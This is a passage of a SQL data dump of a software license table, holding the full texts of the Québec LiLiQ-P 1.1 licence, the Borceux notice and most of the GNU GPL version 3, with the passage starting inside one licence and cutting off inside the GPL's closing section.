LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nEXPORT LAWS: THIS LICENSE ADDS NO RESTRICTIONS TO THE EXPORT LAWS OF YOUR\nJURISDICTION. It is licensee\'s responsibility to comply with any export regulations\napplicable in licensee\'s jurisdiction. Under CURRENT (May 2000) U.S. export\nregulations this software is eligible for export from the U.S. and can be\ndownloaded by or otherwise exported or reexported worldwide EXCEPT to U.S.\nembargoed destinations which include Cuba, Iraq, Libya, North Korea, Iran,\nSyria, Sudan, Afghanistan and any other country to which the U.S. has embargoed\ngoods and services.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(197,'LiLiQ-P-1.1','Licence Libre du Québec – Permissive (LiLiQ-P)\n\nVersion 1.1\n\n 1. Préambule\n\nCette licence s\'applique à tout logiciel distribué dont le titulaire du droit\nd\'auteur précise qu\'il est sujet aux termes de la Licence Libre du Québec\n– Permissive (LiLiQ-P) (ci-après appelée la « licence »).\n\n 2. Définitions\n\nDans la présente licence, à moins que le contexte n\'indique un sens différent,\non entend par:\n\n« concédant » : le titulaire du droit d\'auteur sur le logiciel, ou toute personne\ndûment autorisée par ce dernier à accorder la présente licence;\n\n« contributeur » : le titulaire du droit d\'auteur ou toute personne autorisée\npar ce dernier à soumettre au concédant une contribution. Un contributeur\ndont sa contribution est incorporée au logiciel est considéré comme un concédant\nen regard de sa contribution;\n\n« contribution » : tout logiciel original, ou partie de logiciel original\nsoumis et destiné à être incorporé dans le logiciel;\n\n « distribution » : le fait de délivrer une copie du logiciel;\n\n« licencié » : toute personne qui possède une copie du logiciel et qui exerce\nles droits concédés par la licence;\n\n« logiciel » : une œuvre protégée par le droit d\'auteur, telle qu\'un programme\nd\'ordinateur et sa documentation, pour laquelle le titulaire du droit d\'auteur\na précisé qu\'elle est sujette aux termes de la présente licence;\n\n« logiciel dérivé » : tout logiciel original réalisé par un licencié, autre\nque le logiciel ou un logiciel modifié, qui produit ou reproduit la totalité\nou une partie importante du logiciel;\n\n« logiciel modifié » : toute modification par un licencié de l\'un des fichiers\nsource du logiciel ou encore tout nouveau fichier source qui incorpore le\nlogiciel ou une partie importante de ce dernier.\n\n 3. Licence de droit d\'auteur\n\nSous réserve des termes de la licence, le concédant accorde au licencié une\nlicence non exclusive et libre de redevances lui permettant d\'exercer les\ndroits suivants sur le logiciel :\n\n 1 Produire ou reproduire la totalité ou une partie importante;\n\n2 Exécuter ou représenter la totalité ou une partie importante en public;\n\n 3 Publier la totalité ou une partie importante;\n\n4 Sous-licencier sous une autre licence libre, approuvée ou certifiée par\nla Free Software Foundation ou l\'Open Source Initiative.\n\n \n\n Cette licence est accordée sans limite territoriale et sans limite de temps.\n\nL\'exercice complet de ces droits est sujet à la distribution par le concédant\ndu code source du logiciel, lequel doit être sous une forme permettant d\'y\napporter des modifications. Le concédant peut aussi distribuer le logiciel\naccompagné d\'une offre de distribuer le code source du logiciel, sans frais\nsupplémentaires, autres que ceux raisonnables afin de permettre la livraison\ndu code source. Cette offre doit être valide pendant une durée raisonnable.\n\n 4. Distribution\n\nLe licencié peut distribuer des copies du logiciel, d\'un logiciel modifié\nou dérivé, sous réserve de respecter les conditions suivantes :\n\n \n\n 1 Le logiciel doit être accompagné d\'un exemplaire de cette licence;\n\n2 Si le logiciel a été modifié, le licencié doit en faire la mention, de\npréférence dans chacun des fichiers modifiés dont la nature permet une telle\nmention;\n\n3 Les étiquettes ou mentions faisant état des droits d\'auteur, des marques\nde commerce, des garanties ou de la paternité concernant le logiciel ne doivent\npas être modifiées ou supprimées, à moins que ces étiquettes ou mentions ne\nsoient inapplicables à un logiciel modifié ou dérivé donné.\n\n \n\n 5.\n\n Contributions\n\nSous réserve d\'une entente distincte, toute contribution soumise par un contributeur\nau concédant pour inclusion dans le logiciel sera soumise aux termes de cette\nlicence.\n\n 6. Marques de commerce\n\nLa licence n\'accorde aucune permission particulière qui permettrait d\'utiliser\nles marques de commerce du concédant, autre que celle requise permettant d\'identifier\nla provenance du logiciel.\n\n 7. Garanties\n\nSauf mention contraire, le concédant distribue le logiciel sans aucune garantie,\naux risques et périls de l\'acquéreur de la copie du logiciel, et ce, sans\nassurer que le logiciel puisse répondre à un besoin particulier ou puisse\ndonner un résultat quelconque.\n\nSans lier le concédant d\'une quelconque manière, rien n\'empêche un licencié\nd\'offrir ou d\'exclure des garanties ou du support.\n\n 8. Responsabilité\n\nLe licencié est responsable de tout préjudice résultant de l\'exercice des\ndroits accordés par la licence.\n\nLe concédant ne saurait être tenu responsable de dommages subis par le licencié\nou par des tiers, pour quelque cause que ce soit en lien avec la licence et\nles droits qui y sont accordés.\n\n 9. Résiliation\n\nLa présente licence est automatiquement résiliée dès que les droits qui y\nsont accordés ne sont pas exercés conformément aux termes qui y sont stipulés.\n\nToutefois, si le défaut est corrigé dans un délai de 30 jours de sa prise\nde connaissance par la personne en défaut, et qu\'il s\'agit du premier défaut,\nla licence est accordée de nouveau.\n\nPour tout défaut subséquent, le consentement exprès du concédant est nécessaire\nafin que la licence soit accordée de nouveau.\n\n 10. Version de la licence\n\nLe Centre de services partagés du Québec, ses ayants cause ou toute personne\nqu\'il désigne, peuvent diffuser des versions révisées ou modifiées de cette\nlicence. Chaque version recevra un numéro unique. Si un logiciel est déjà\nsoumis aux termes d\'une version spécifique, c\'est seulement cette version\nqui liera les parties à la licence.\n\nLe concédant peut aussi choisir de concéder la licence sous la version actuelle\nou toute version ultérieure, auquel cas le licencié peut choisir sous quelle\nversion la licence lui est accordée.\n\n 11. Divers\n\nDans la mesure où le concédant est un ministère, un organisme public ou une\npersonne morale de droit public, créés en vertu d\'une loi de l\'Assemblée nationale\ndu Québec, la licence est régie par le droit applicable au Québec et en cas\nde contestation, les tribunaux du Québec seront seuls compétents.\n\nLa présente licence peut être distribuée sans conditions particulières. Toutefois,\nune version modifiée doit être distribuée sous un nom différent. Toute référence\nau Centre de services partagés du Québec, et, le cas échéant, ses ayant cause,\ndoit être retirée, autre que celle permettant d\'identifier la provenance de\nla licence.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(198,'Borceux','Copyright 1993 Francis Borceux\n\nYou may freely use, modify, and/or distribute each of the files in this package\nwithout limitation. The package consists of the following files:\n\nREADME\n\ncompatibility/OldDiagram\n\ncompatibility/OldMaxiDiagram\n\ncompatibility/OldMicroDiagram\n\ncompatibility/OldMiniDiagram\n\ncompatibility/OldMultipleArrows\n\ndiagram/Diagram\n\ndiagram/MaxiDiagram\n\ndiagram/MicroDiagram\n\ndiagram/MiniDiagram\n\ndiagram/MultipleArrows\n\nuser-guides/Diagram_Mode_d_Emploi\n\nuser-guides/Diagram_Read_Me\n\nOf course no support is guaranteed, but the author will attempt to assist\nwith problems. Current email address:\n\nfrancis dot borceux at uclouvain dot be.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(199,'GPL-3.0-or-later','GNU GENERAL PUBLIC LICENSE\n\nVersion 3, 29 June 2007\n\nCopyright © 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe GNU General Public License is a free, copyleft license for software and\nother kinds of works.\n\nThe licenses for most software and other practical works are designed to take\naway your freedom to share and change the works. By contrast, the GNU General\nPublic License is intended to guarantee your freedom to share and change all\nversions of a program--to make sure it remains free software for all its users.\nWe, the Free Software Foundation, use the GNU General Public License for most\nof our software; it applies also to any other work released this way by its\nauthors. You can apply it to your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for them if you wish), that\nyou receive source code or can get it if you want it, that you can change\nthe software or use pieces of it in new free programs, and that you know you\ncan do these things.\n\nTo protect your rights, we need to prevent others from denying you these rights\nor asking you to surrender the rights. Therefore, you have certain responsibilities\nif you distribute copies of the software, or if you modify it: responsibilities\nto respect the freedom of others.\n\nFor example, if you distribute copies of such a program, whether gratis or\nfor a fee, you must pass on to the recipients the same freedoms that you received.\nYou must make sure that they, too, receive or can get the source code. And\nyou must show them these terms so they know their rights.\n\nDevelopers that use the GNU GPL protect your rights with two steps: (1) assert\ncopyright on the software, and (2) offer you this License giving you legal\npermission to copy, distribute and/or modify it.\n\nFor the developers\' and authors\' protection, the GPL clearly explains that\nthere is no warranty for this free software. For both users\' and authors\'\nsake, the GPL requires that modified versions be marked as changed, so that\ntheir problems will not be attributed erroneously to authors of previous versions.\n\nSome devices are designed to deny users access to install or run modified\nversions of the software inside them, although the manufacturer can do so.\nThis is fundamentally incompatible with the aim of protecting users\' freedom\nto change the software. The systematic pattern of such abuse occurs in the\narea of products for individuals to use, which is precisely where it is most\nunacceptable. Therefore, we have designed this version of the GPL to prohibit\nthe practice for those products. If such problems arise substantially in other\ndomains, we stand ready to extend this provision to those domains in future\nversions of the GPL, as needed to protect the freedom of users.\n\nFinally, every program is threatened constantly by software patents. States\nshould not allow patents to restrict development and use of software on general-purpose\ncomputers, but in those that do, we wish to avoid the special danger that\npatents applied to a free program could make it effectively proprietary. To\nprevent this, the GPL assures that patents cannot be used to render the program\nnon-free.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU General Public License.\n\n\"Copyright\" also means copyright-like laws that apply to other kinds of works,\nsuch as semiconductor masks.\n\n\"The Program\" refers to any copyrightable work licensed under this License.\nEach licensee is addressed as \"you\". \"Licensees\" and \"recipients\" may be individuals\nor organizations.\n\nTo \"modify\" a work means to copy from or adapt all or part of the work in\na fashion requiring copyright permission, other than the making of an exact\ncopy. The resulting work is called a \"modified version\" of the earlier work\nor a work \"based on\" the earlier work.\n\nA \"covered work\" means either the unmodified Program or a work based on the\nProgram.\n\nTo \"propagate\" a work means to do anything with it that, without permission,\nwould make you directly or secondarily liable for infringement under applicable\ncopyright law, except executing it on a computer or modifying a private copy.\nPropagation includes copying, distribution (with or without modification),\nmaking available to the public, and in some countries other activities as\nwell.\n\nTo \"convey\" a work means any kind of propagation that enables other parties\nto make or receive copies. Mere interaction with a user through a computer\nnetwork, with no transfer of a copy, is not conveying.\n\nAn interactive user interface displays \"Appropriate Legal Notices\" to the\nextent that it includes a convenient and prominently visible feature that\n(1) displays an appropriate copyright notice, and (2) tells the user that\nthere is no warranty for the work (except to the extent that warranties are\nprovided), that licensees may convey the work under this License, and how\nto view a copy of this License. If the interface presents a list of user commands\nor options, such as a menu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\nThe \"source code\" for a work means the preferred form of the work for making\nmodifications to it. \"Object code\" means any non-source form of a work.\n\nA \"Standard Interface\" means an interface that either is an official standard\ndefined by a recognized standards body, or, in the case of interfaces specified\nfor a particular programming language, one that is widely used among developers\nworking in that language.\n\nThe \"System Libraries\" of an executable work include anything, other than\nthe work as a whole, that (a) is included in the normal form of packaging\na Major Component, but which is not part of that Major Component, and (b)\nserves only to enable use of the work with that Major Component, or to implement\na Standard Interface for which an implementation is available to the public\nin source code form. A \"Major Component\", in this context, means a major essential\ncomponent (kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to produce\nthe work, or an object code interpreter used to run it.\n\nThe \"Corresponding Source\" for a work in object code form means all the source\ncode needed to generate, install, and (for an executable work) run the object\ncode and to modify the work, including scripts to control those activities.\nHowever, it does not include the work\'s System Libraries, or general-purpose\ntools or generally available free programs which are used unmodified in performing\nthose activities but which are not part of the work. For example, Corresponding\nSource includes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically linked\nsubprograms that the work is specifically designed to require, such as by\nintimate data communication or control flow between those subprograms and\nother parts of the work.\n\nThe Corresponding Source need not include anything that users can regenerate\nautomatically from other parts of the Corresponding Source.\n\n The Corresponding Source for a work in source code form is that same work.\n\n 2. Basic Permissions.\n\nAll rights granted under this License are granted for the term of copyright\non the Program, and are irrevocable provided the stated conditions are met.\nThis License explicitly affirms your unlimited permission to run the unmodified\nProgram. The output from running a covered work is covered by this License\nonly if the output, given its content, constitutes a covered work. This License\nacknowledges your rights of fair use or other equivalent, as provided by copyright\nlaw.\n\nYou may make, run and propagate covered works that you do not convey, without\nconditions so long as your license otherwise remains in force. You may convey\ncovered works to others for the sole purpose of having them make modifications\nexclusively for you, or provide you with facilities for running those works,\nprovided that you comply with the terms of this License in conveying all material\nfor which you do not control copyright. Those thus making or running the covered\nworks for you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of your copyrighted\nmaterial outside their relationship with you.\n\nConveying under any other circumstances is permitted solely under the conditions\nstated below. Sublicensing is not allowed; section 10 makes it unnecessary.\n\n 3. Protecting Users\' Legal Rights From Anti-Circumvention Law.\n\nNo covered work shall be deemed part of an effective technological measure\nunder any applicable law fulfilling obligations under article 11 of the WIPO\ncopyright treaty adopted on 20 December 1996, or similar laws prohibiting\nor restricting circumvention of such measures.\n\nWhen you convey a covered work, you waive any legal power to forbid circumvention\nof technological measures to the extent such circumvention is effected by\nexercising rights under this License with respect to the covered work, and\nyou disclaim any intention to limit operation or modification of the work\nas a means of enforcing, against the work\'s users, your or third parties\'\nlegal rights to forbid circumvention of technological measures.\n\n 4. Conveying Verbatim Copies.\n\nYou may convey verbatim copies of the Program\'s source code as you receive\nit, in any medium, provided that you conspicuously and appropriately publish\non each copy an appropriate copyright notice; keep intact all notices stating\nthat this License and any non-permissive terms added in accord with section\n7 apply to the code; keep intact all notices of the absence of any warranty;\nand give all recipients a copy of this License along with the Program.\n\nYou may charge any price or no price for each copy that you convey, and you\nmay offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\nYou may convey a work based on the Program, or the modifications to produce\nit from the Program, in the form of source code under the terms of section\n4, provided that you also meet all of these conditions:\n\na) The work must carry prominent notices stating that you modified it, and\ngiving a relevant date.\n\nb) The work must carry prominent notices stating that it is released under\nthis License and any conditions added under section 7. This requirement modifies\nthe requirement in section 4 to \"keep intact all notices\".\n\nc) You must license the entire work, as a whole, under this License to anyone\nwho comes into possession of a copy. This License will therefore apply, along\nwith any applicable section 7 additional terms, to the whole of the work,\nand all its parts, regardless of how they are packaged. This License gives\nno permission to license the work in any other way, but it does not invalidate\nsuch permission if you have separately received it.\n\nd) If the work has interactive user interfaces, each must display Appropriate\nLegal Notices; however, if the Program has interactive interfaces that do\nnot display Appropriate Legal Notices, your work need not make them do so.\n\nA compilation of a covered work with other separate and independent works,\nwhich are not by their nature extensions of the covered work, and which are\nnot combined with it such as to form a larger program, in or on a volume of\na storage or distribution medium, is called an \"aggregate\" if the compilation\nand its resulting copyright are not used to limit the access or legal rights\nof the compilation\'s users beyond what the individual works permit. Inclusion\nof a covered work in an aggregate does not cause this License to apply to\nthe other parts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\nYou may convey a covered work in object code form under the terms of sections\n4 and 5, provided that you also convey the machine-readable Corresponding\nSource under the terms of this License, in one of these ways:\n\na) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by the Corresponding Source fixed\non a durable physical medium customarily used for software interchange.\n\nb) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by a written offer, valid for\nat least three years and valid for as long as you offer spare parts or customer\nsupport for that product model, to give anyone who possesses the object code\neither (1) a copy of the Corresponding Source for all the software in the\nproduct that is covered by this License, on a durable physical medium customarily\nused for software interchange, for a price no more than your reasonable cost\nof physically performing this conveying of source, or (2) access to copy the\nCorresponding Source from a network server at no charge.\n\nc) Convey individual copies of the object code with a copy of the written\noffer to provide the Corresponding Source. This alternative is allowed only\noccasionally and noncommercially, and only if you received the object code\nwith such an offer, in accord with subsection 6b.\n\nd) Convey the object code by offering access from a designated place (gratis\nor for a charge), and offer equivalent access to the Corresponding Source\nin the same way through the same place at no further charge. You need not\nrequire recipients to copy the Corresponding Source along with the object\ncode. If the place to copy the object code is a network server, the Corresponding\nSource may be on a different server (operated by you or a third party) that\nsupports equivalent copying facilities, provided you maintain clear directions\nnext to the object code saying where to find the Corresponding Source. Regardless\nof what server hosts the Corresponding Source, you remain obligated to ensure\nthat it is available for as long as needed to satisfy these requirements.\n\ne) Convey the object code using peer-to-peer transmission, provided you inform\nother peers where the object code and Corresponding Source of the work are\nbeing offered to the general public at no charge under subsection 6d.\n\nA separable portion of the object code, whose source code is excluded from\nthe Corresponding Source as a System Library, need not be included in conveying\nthe object code work.\n\nA \"User Product\" is either (1) a \"consumer product\", which means any tangible\npersonal property which is normally used for personal, family, or household\npurposes, or (2) anything designed or sold for incorporation into a dwelling.\nIn determining whether a product is a consumer product, doubtful cases shall\nbe resolved in favor of coverage. For a particular product received by a particular\nuser, \"normally used\" refers to a typical or common use of that class of product,\nregardless of the status of the particular user or of the way in which the\nparticular user actually uses, or expects or is expected to use, the product.\nA product is a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent the\nonly significant mode of use of the product.\n\n\"Installation Information\" for a User Product means any methods, procedures,\nauthorization keys, or other information required to install and execute modified\nversions of a covered work in that User Product from a modified version of\nits Corresponding Source. The information must suffice to ensure that the\ncontinued functioning of the modified object code is in no case prevented\nor interfered with solely because modification has been made.\n\nIf you convey an object code work under this section in, or with, or specifically\nfor use in, a User Product, and the conveying occurs as part of a transaction\nin which the right of possession and use of the User Product is transferred\nto the recipient in perpetuity or for a fixed term (regardless of how the\ntransaction is characterized), the Corresponding Source conveyed under this\nsection must be accompanied by the Installation Information. But this requirement\ndoes not apply if neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has been installed\nin ROM).\n\nThe requirement to provide Installation Information does not include a requirement\nto continue to provide support service, warranty, or updates for a work that\nhas been modified or installed by the recipient, or for the User Product in\nwhich it has been modified or installed. Access to a network may be denied\nwhen the modification itself materially and adversely affects the operation\nof the network or violates the rules and protocols for communication across\nthe network.\n\nCorresponding Source conveyed, and Installation Information provided, in accord\nwith this section must be in a format that is publicly documented (and with\nan implementation available to the public in source code form), and must require\nno special password or key for unpacking, reading or copying.\n\n 7. Additional Terms.\n\n\"Additional permissions\" are terms that supplement the terms of this License\nby making exceptions from one or more of its conditions. Additional permissions\nthat are applicable to the entire Program shall be treated as though they\nwere included in this License, to the extent that they are valid under applicable\nlaw. If additional permissions apply only to part of the Program, that part\nmay be used separately under those permissions, but the entire Program remains\ngoverned by this License without regard to the additional permissions.\n\nWhen you convey a copy of a covered work, you may at your option remove any\nadditional permissions from that copy, or from any part of it. (Additional\npermissions may be written to require their own removal in certain cases when\nyou modify the work.) You may place additional permissions on material, added\nby you to a covered work, for which you have or can give appropriate copyright\npermission.\n\nNotwithstanding any other provision of this License, for material you add\nto a covered work, you may (if authorized by the copyright holders of that\nmaterial) supplement the terms of this License with terms:\n\na) Disclaiming warranty or limiting liability differently from the terms of\nsections 15 and 16 of this License; or\n\nb) Requiring preservation of specified reasonable legal notices or author\nattributions in that material or in the Appropriate Legal Notices displayed\nby works containing it; or\n\nc) Prohibiting misrepresentation of the origin of that material, or requiring\nthat modified versions of such material be marked in reasonable ways as different\nfrom the original version; or\n\nd) Limiting the use for publicity purposes of names of licensors or authors\nof the material; or\n\ne) Declining to grant rights under trademark law for use of some trade names,\ntrademarks, or service marks; or\n\nf) Requiring indemnification of licensors and authors of that material by\nanyone who conveys the material (or modified versions of it) with contractual\nassumptions of liability to the recipient, for any liability that these contractual\nassumptions directly impose on those licensors and authors.\n\nAll other non-permissive additional terms are considered \"further restrictions\"\nwithin the meaning of section 10. If the Program as you received it, or any\npart of it, contains a notice stating that it is governed by this License\nalong with a term that is a further restriction, you may remove that term.\nIf a license document contains a further restriction but permits relicensing\nor conveying under this License, you may add to a covered work material governed\nby the terms of that license document, provided that the further restriction\ndoes not survive such relicensing or conveying.\n\nIf you add terms to a covered work in accord with this section, you must place,\nin the relevant source files, a statement of the additional terms that apply\nto those files, or a notice indicating where to find the applicable terms.\n\nAdditional terms, permissive or non-permissive, may be stated in the form\nof a separately written license, or stated as exceptions; the above requirements\napply either way.\n\n 8. Termination.\n\nYou may not propagate or modify a covered work except as expressly provided\nunder this License. Any attempt otherwise to propagate or modify it is void,\nand will automatically terminate your rights under this License (including\nany patent licenses granted under the third paragraph of section 11).\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, you do\nnot qualify to receive new licenses for the same material under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\nYou are not required to accept this License in order to receive or run a copy\nof the Program. Ancillary propagation of a covered work occurring solely as\na consequence of using peer-to-peer transmission to receive a copy likewise\ndoes not require acceptance. However, nothing other than this License grants\nyou permission to propagate or modify any covered work. These actions infringe\ncopyright if you do not accept this License. Therefore, by modifying or propagating\na covered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\nEach time you convey a covered work, the recipient automatically receives\na license from the original licensors, to run, modify and propagate that work,\nsubject to this License. You are not responsible for enforcing compliance\nby third parties with this License.\n\nAn \"entity transaction\" is a transaction transferring control of an organization,\nor substantially all assets of one, or subdividing an organization, or merging\norganizations. If propagation of a covered work results from an entity transaction,\neach party to that transaction who receives a copy of the work also receives\nwhatever licenses to the work the party\'s predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the Corresponding\nSource of the work from the predecessor in interest, if the predecessor has\nit or can get it with reasonable efforts.\n\nYou may not impose any further restrictions on the exercise of the rights\ngranted or affirmed under this License. For example, you may not impose a\nlicense fee, royalty, or other charge for exercise of rights granted under\nthis License, and you may not initiate litigation (including a cross-claim\nor counterclaim in a lawsuit) alleging that any patent claim is infringed\nby making, using, selling, offering for sale, or importing the Program or\nany portion of it.\n\n 11. Patents.\n\nA \"contributor\" is a copyright holder who authorizes use under this License\nof the Program or a work on which the Program is based. The work thus licensed\nis called the contributor\'s \"contributor version\".\n\nA contributor\'s \"essential patent claims\" are all patent claims owned or controlled\nby the contributor, whether already acquired or hereafter acquired, that would\nbe infringed by some manner, permitted by this License, of making, using,\nor selling its contributor version, but do not include claims that would be\ninfringed only as a consequence of further modification of the contributor\nversion. For purposes of this definition, \"control\" includes the right to\ngrant patent sublicenses in a manner consistent with the requirements of this\nLicense.\n\nEach contributor grants you a non-exclusive, worldwide, royalty-free patent\nlicense under the contributor\'s essential patent claims, to make, use, sell,\noffer for sale, import and otherwise run, modify and propagate the contents\nof its contributor version.\n\nIn the following three paragraphs, a \"patent license\" is any express agreement\nor commitment, however denominated, not to enforce a patent (such as an express\npermission to practice a patent or covenant not to sue for patent infringement).\nTo \"grant\" such a patent license to a party means to make such an agreement\nor commitment not to enforce a patent against the party.\n\nIf you convey a covered work, knowingly relying on a patent license, and the\nCorresponding Source of the work is not available for anyone to copy, free\nof charge and under the terms of this License, through a publicly available\nnetwork server or other readily accessible means, then you must either (1)\ncause the Corresponding Source to be so available, or (2) arrange to deprive\nyourself of the benefit of the patent license for this particular work, or\n(3) arrange, in a manner consistent with the requirements of this License,\nto extend the patent license to downstream recipients. \"Knowingly relying\"\nmeans you have actual knowledge that, but for the patent license, your conveying\nthe covered work in a country, or your recipient\'s use of the covered work\nin a country, would infringe one or more identifiable patents in that country\nthat you have reason to believe are valid.\n\nIf, pursuant to or in connection with a single transaction or arrangement,\nyou convey, or propagate by procuring conveyance of, a covered work, and grant\na patent license to some of the parties receiving the covered work authorizing\nthem to use, propagate, modify or convey a specific copy of the covered work,\nthen the patent license you grant is automatically extended to all recipients\nof the covered work and works based on it.\n\nA patent license is \"discriminatory\" if it does not include within the scope\nof its coverage, prohibits the exercise of, or is conditioned on the non-exercise\nof one or more of the rights that are specifically granted under this License.\nYou may not convey a covered work if you are a party to an arrangement with\na third party that is in the business of distributing software, under which\nyou make payment to the third party based on the extent of your activity of\nconveying the work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory patent\nlicense (a) in connection with copies of the covered work conveyed by you\n(or copies made from those copies), or (b) primarily for and in connection\nwith specific products or compilations that contain the covered work, unless\nyou entered into that arrangement, or that patent license was granted, prior\nto 28 March 2007.\n\nNothing in this License shall be construed as excluding or limiting any implied\nlicense or other defenses to infringement that may otherwise be available\nto you under applicable patent law.\n\n 12. No Surrender of Others\' Freedom.\n\nIf conditions are imposed on you (whether by court order, agreement or otherwise)\nthat contradict the conditions of this License, they do not excuse you from\nthe conditions of this License. If you cannot convey a covered work so as\nto satisfy simultaneously your obligations under this License and any other\npertinent obligations, then as a consequence you may not convey it at all.\nFor example, if you agree to terms that obligate you to collect a royalty\nfor further conveying from those to whom you convey the Program, the only\nway you could satisfy both those terms and this License would be to refrain\nentirely from conveying the Program.\n\n 13. Use with the GNU Affero General Public License.\n\nNotwithstanding any other provision of this License, you have permission to\nlink or combine any covered work with a work licensed under version 3 of the\nGNU Affero General Public License into a single combined work, and to convey\nthe resulting work. The terms of this License will continue to apply to the\npart which is the covered work, but the special requirements of the GNU Affero\nGeneral Public License, section 13, concerning interaction through a network\nwill apply to the combination as such.\n\n 14. Revised Versions of this License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\nthat a certain numbered version of the GNU General Public License \"or any\nlater version\" applies to it, you have the option of following the terms and\nconditions either of that numbered version or of any later version published\nby the Free Software Foundation. If the Program does not specify a version\nnumber of the GNU General Public License, you may choose any version ever\npublished by the Free Software Foundation.\n\nIf the Program specifies that a proxy can decide which future versions of\nthe GNU General Public License can be used, that proxy\'s public statement\nof acceptance of a version permanently authorizes you to choose that version\nfor the Program.\n\nLater license versions may give you additional or different permissions. However,\nno additional obligations are imposed on any author or copyright holder as\na result of your choosing to follow a later version.\n\n 15. Disclaimer of Warranty.\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE\nLAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR\nOTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER\nEXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM\nPROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nCORRECTION.\n\n 16. Limitation of Liability.\n\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL\nANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM\nAS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,\nINCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO\nUSE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED\nINACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE\nPROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER\nPARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\nIf the disclaimer of warranty and limitation of liability provided above cannot\nbe given local legal effect according to their terms, reviewing courts shall\napply local law that most closely approximates an absolute waiver of all civil\nliability in connection with the Program, unless a warranty or assumption\nof liability accompanies a copy of the Program in return for a fee. END OF\nTERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively state the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.>\n\nCopyright (C) <year> <name of author>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see <http s ://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program does terminal interaction, make it output a short notice like\nthis when it starts in an interactive mode:\n\n<program> Copyright (C) <year> <name of author>\n\nThis program comes with ABSOLUTELY NO WARRANTY; for details type `show w\'.\n\nThis is free software, and you are welcome to redistribute it under certain\nconditions; type `show c\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, your program\'s commands might\nbe different; for a 